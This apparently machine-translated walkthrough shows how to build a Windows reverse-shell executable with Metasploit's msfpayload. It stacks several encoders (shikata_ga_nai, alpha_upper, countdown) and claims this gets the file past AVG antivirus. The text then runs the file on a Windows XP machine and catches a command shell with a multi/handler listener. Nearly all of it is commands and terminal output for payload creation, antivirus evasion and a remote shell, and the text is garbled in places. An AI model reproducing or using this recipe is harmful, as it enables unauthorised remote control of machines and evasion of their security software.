root@bt:~# time Msfpayload windows/shell_reverse_tcp lhost=192.168.1.11 lport=31337 R | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | MSFENCODE-E x86/alpha_upper-c 2-t Raw | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | Msfencode-e x86/countdown-c 5-t exe-o read.exe [*] X86/shikata_ga_nai succeeded with size 341 (iteration=1) [*] x86/s Hikata_ga_nai succeeded with size 368 (iteration=2) [*] X86/shikata_ga_nai succeeded with size 395 (iteration=3) [*] x86 /shikata_ga_nai succeeded with size 422 (iteration=4) [*] X86/shikata_ga_nai succeeded with size 449 (iteration=5) [*] X 86/alpha_upper succeeded with size 966 (iteration=1) [*] X86/alpha_upper succeeded with size (iteration=2) [*] x86/ Shikata_ga_nai succeeded with size 2029 (iteration=1) [*] X86/shikata_ga_nai succeeded with size 2058 (iteration=2) [*]
X86/shikata_ga_nai succeeded with size 2087 (iteration=3) [*] X86/shikata_ga_nai succeeded with size 2116 (iteration=4) [*] X86/shikata_ga_nai succeeded with size 21(iteration=5) [*] X86/countdown succeeded with size 2163 (iteration=1) [*] X86/countdown succeeded with size 2181 (it eration=2) [*] X86/countdown succeeded with size 2199 (iteration=3) [*] X86/countdown succeeded with size 2217 (iteratio N=4) [*] X86/countdown succeeded with size 2235 (iteration=5) real 1m33.468s user 0m52.195s sys 0m39.830s Roo t@bt:~#
Upload Read.exe to XP, then run in cmd, antivirus software does not report the threat:
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and SETTINGS\ADMINISTRATOR>CD
. C:\Documents and SETTINGS>CD
. C:\>read.exe
Then enter the command:
root@bt:~# msfcli exploit/multi/handler payload=windows/shell_reverse_tcp lhost=192.168.1.11 LPORT=31337 E [*] Please
Wait while we load the module tree ... # cowsay++ ____________ < Metasploit >------------\, __, \ (oo) ____ (__)) \ | | --|| * =[Metasploit V4.5.0-dev [core:4.5 api:1.0] +----=[927 exploits-499 auxiliary-151 post +----=[251 pay loads-28 encoders-8 Nops PAYLOAD = windows/shell_reverse_tcp Lhost = 192.168.1.11 Lport = 31337 [*] Start
Ed Reverse handler on 192.168.1.11:31337 [*] Starting the payload handler ... [*] Command Shell Session 1 opened (192.168.1.11:31337-192.168.1.142:1181) at 2013-04-28 06:06:36-0400 Microsoft Windo
WS XP [version 5.1.2600] (C) All rights reserved 1985-2001 Microsoft Corp.
C:\>dir dir Drive C does not have a label in the volume. The serial number of the volume is 3052-fa52 c \ The directory 2012-03-24 11:55 0 AUTOEXEC. BAT 2013-04-28 16:06 131,820,480 avg_free_x86_all_2013.exe 2012-03-24 11:55 0 CONFIG. SYS 2012-03-24 11:59 <DIR> Documents and Settings 2013-04-28 17:08 <DIR> program Fil Es 2013-04-29 22:17 73,802 read.exe 2013-04-28 21:37 the readme.txt 2013-04-28 15:19 <di
r> Ruby 2013-04-28 20:45 <DIR> WINDOWS 5 files 131,894,320 bytes 4 directories 5,329,256,448 Available Bytes c:\>
This opens a remote shell and does not "disturb" AVG's antivirus software.